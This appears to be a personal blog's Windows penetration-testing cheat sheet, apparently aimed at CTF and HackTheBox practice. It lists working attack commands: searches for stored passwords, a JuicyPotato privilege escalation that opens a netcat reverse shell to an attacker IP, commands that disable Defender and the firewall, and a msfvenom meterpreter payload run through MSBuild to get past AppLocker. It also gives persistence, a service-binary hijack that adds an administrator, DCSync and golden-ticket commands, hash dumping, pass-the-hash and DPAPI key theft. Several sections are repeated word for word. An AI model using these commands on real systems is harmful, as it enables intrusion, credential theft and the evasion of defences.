f4d3

f4d3

InfoSec enthusiast | pwn | RE | CTF | BugBounty

Windows Cheat-Sheet

What’s here ?

  • Some essential enum things. :smile:
  • Some powershell kung-fu master-fu

Enum scripts/bins:

General

Check general info:

systeminfo
whoami /privs
hostname

Check drives:

get-psdrive

Dir (Including hiddens) powershell:

get-childitem -force

Check users/localgroups on the local machine:

Local users

net users

Local localgroups

net localgroups

Get info about some user

net users "USERNAME"

View member of domain group

net group /domain "GROUP NAME"

Check firewall on the local machine:

netsh firewall show state
netsh firewall show config

Network:

Check local ip config:

ipconfig /all

Check local route:

route print

Check local arp table:

arp -a

Check local listening ports:

netstat -ano

Search things - misc:

Search items by SID:

C:\*.* /findsid HACKBACK\project-managers /T /C | findstr /R /C:"[SIDFound]

Search by string:

findstr /si password *.txt
findstr /si password *.ini
findstr /si password *.xml

Files that normally contain plain-text passwords:

C:\sysprep.inf
C:\sysprep\sysprep.xml
%WINDIR%\Panther\Unattend\Unattended.xml
%WINDIR%\Panther\Unattended.xml

Search for writable dir:

dir /a-r-d /s /b

Search files (METERPRETER):

search -f *.exe

Look for scheduled tasks:

schtasks /query /fo LIST /v

Look for some services:

Get-ChildItem 'HKLM:SYSTEM\CurrentControlSet\Services'
sc.exe qc
sc.exe query SERVICE_NAME

Special SeImpersonatePrivilege:

Its nice to use juicy-potato if the priv is active.

juicypotato -l 1337 -p C:\windows\system32\cmd.exe -a "/c C:\path\to\nc.exe -e cmd.exe attacker_ip port" -t *

Get permissions with icacls :

icacls C:\path\to\file

Grant permission to user:

icacls c:\path\to\file /grant USERNAME(OI)(CI)F /T

I have creds, what I can do?

Impersonate someone!

First, we create a cred-object:

$password = ConvertTo-SecureString 'PASSWORD' -AsPlainText -Force

Here, we can save de creds as a “SecureString”.

$credential = New-Object System.Management.Automation.PSCredential ('USERNAME', $password)
invoke-command -ComputerName "ComputerName" -ScriptBlock {ping -n 3 10.10.10.10} -Credential $credential

Add the flag -Authentication CredSSP, to the invoke-command shot if you’re experiencing problems with powershell double hop problem

NOTE, If we have the “SecureString saved”, we can load it into a cred object, and read the plaintext password!

$credential.GetNetworkCredential().Password

We can use net use for manage local drives! “A mount point”

net use z: \\IP_ADDRESS\c$ /user:USERNAME PASSWORD

Look for everything on one file (Alternative streams):

Get-Itemproperty -path C:\path\to\file
Get-Item -path C:\path\to\file -force -stream *

Read a certain stream

Get-Content -path C:\path\to\file -force -stream selected_stream

Have permission to check logs ?

check this

Disable AV - windows defender:

Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend

Disable firewall:

netsh advfirewall set allprofiles state off

Make a meterpreter shell in CSHARP, and execute in-memory with MSBUILD (Great!):

msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f csharp -e x86/shikata_ga_nai -i 20

Put the generated shellcode inside this snippet of MSBUILD (Replace the shellcode var) MSBuild template

Save it into a nice dir, (Applocker bypass) i.e:

C:\Windows\System32\spool\drivers\color
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\System32\spool\drivers\color\fade.xml

Make it persistent!

run persistence -U -i 60 -p LPORT -r LHOST

Look for weak permissions:

If a binary is installed by the user, and we have read/write acces on it, we can rename the .exe file and put our own.

cacls C:\path\to\bin.exe
BUILTIN\Users:F
BUILTIN\Power Users:C
BUILTIN\Administrators:F
NT AUTHORITY\SYSTEM:F

with that, we can rewrite the .exe with our own:

#include <stdlib.h>
int main ()
{
int i;
    i = system("net localgroup administrators theusername /add");
return 0;
}

Compile it:

i686-w64-mingw32-gcc windows-exp.c -lws2_32 -o exp.exe

Place it instead of the original, and restart the service that is using the executable.

net stop SERVICE_NAME && net start SERVICE_NAME.
# or
sc.exe start SERVICENAME
# or
wmic service SERVICE_NAME call startservice

File download

Invoke-WebRequest -Uri "http://attacker_ip/file" -OutFile "C:\path\to\file"

Getting everything with juicy potato (W server 2012 –)

Download the binary from here Get r00t

juicypotato.exe -l 9001 -t * -c {8BC3F05E-D86B-11D0-A075-00C04FB68820} -p c:\windows\system32\cmd.exe -a "/c whoami > C:\r00t.txt"

Basic ldap querys

ldapsearch -h <ip_address> -x -b "DC=DOMAIN_NAME,DC=LOCAL"

If we’re in as a Doin Admin (mimikatz, wiki):

A dcsync attack with mimi:

log
lsadump::dcsync /domain:DOMAIN_NAME /user:USER_NAME /all

Create golden ticket with mimi:

kerberos::golden /user:USERNAME /domain:DOMAIN /sid:DOMAIN-SID  /krbtgt:KRBT_HASH /ticket:FILENAME /groups:GROUPS

Use it!

kerberos::ptt Filename
dir \\DomainController\\C$
psexec \\DomainController cmd.exe

Wanna dump ldap as a domain controller ?

python2.7 windapsearch.py -d HTB.LOCAL --dc-ip dc_ip -u domain_name\\dc_username -p dc_password -l all

Wanna dump the hashes ?

secretsdump.py domain/username:password@10.10.10.103

have the hashes? shell:

wmiexec.py -hashes First_part_of_hash:second_part_of_hash <domain_name>/administrator@remote_ip

Decrypt EFS files with mimikatz

cipher /c "C:\users\administrator\desktop\root.txt"

Export public key:

mimikatz $ crypto::system /file:"C:\users\administrator\appdata\roaming\microsoft\systemcertificates\my\certificates\FB154575993A250FE826DBAC79EF26C211CB77B3" /export

Get private key:

mimikatz $ dpapi::capi /in:"C:\Users\Administrator\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3107372852-1132949149-763516304-500\d1775a874937ca4b3cd9b8e334588333_86f90bf3-9d4c-47b0-bc79-380521b14c85"

Decrypt private key:

dpapi::masterkey dpapi::masterkey /in:"C:\users\administrator\appdata\roaming\microsoft\protect\S-1-5-21-3107372852-113
2949149-763516304-500\9e78687d-d881-4ccb-8bd8-bc0a19608687" /password:"PASSWORD"

Create the certificate:

dpapi::capi /in:"C:\users\administrator\appdata\roaming\microsoft\crypto\rsa\S-1-5-21-3107372852-1132949149-763516304-500\d1775a874937ca4b3cd9b8e334588333_86f90bf3-9d4c-47b0-bc79-380521b14c85" /masterkey:"8ed6519c4d09a506504c4f611203bea8979a385f8a444fe57b5d2256ee1e4eb34392a141f502cd9aeea8d2187c2525c3ae998dc3cebad81cc4e41dbb6bc65fa8"

On our own box:

openssl x509 -inform DER -outform PEM -in FB154575993A250FE826DBAC79EF26C211CB77B3.der -out public.pem  

openssl rsa -inform PVK -in raw_exchange_capi_0_3dd3e213-bce6-4acb-808c-a1b3227ecbde.pvk -out private.pem  

openssl pkcs12 -in public.pem -inkey private.pem -password pass:fade -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx

Now we export the cert, on the victim box:

C:\Windows\System32\spool\drivers\color>certutil -user -p fade -importpfx cert.pfx NoChain,NoRoot                            

Now we can read anything encrypted with that key !

If we’re in as a Domain admin (Mimikatz, kiwi):

A dsync attack mimikatz:

log
lsadump::dcsync /domain:DOMAIN_NAME /user:USER_NAME /all

Create a golden ticket mimikatz:

kerberos::golden /user:USERNAME /domain:DOMAIN /sid:DOMAIN-SID  /krbtgt:KRBT_HASH /ticket:FILENAME /groups:GROUPS

Use it !

kerberos::ptt Filename
dir \\DomainController\\C$
psexec \\DomainController cmd.exe

Wanna dump ldap as a domain controller ?

python2.7 windapsearch.py -d HTB.LOCAL --dc-ip dc_ip -u domain_name\\dc_username -p dc_password -l
all

Wanna dump the hashes?

secretsdump.py domain/username:password@10.10.10.103

shell, having the hashes ?

wmiexec.py -hashes First_part_of_hash:second_part_of_hash administrator@remote_ip

Kiwi version

Get hash as a domain admin

dsync_ntlm DOMAIN\\USER

golden_ticket_create -d <domain> -k <krbtgt hash> -s <domain-sid> -u <name, does not have to exist (but can)> -t <filename>

use it:

kerberos_ticket_use <filename>
TODO
...
updated_at 03-05-2020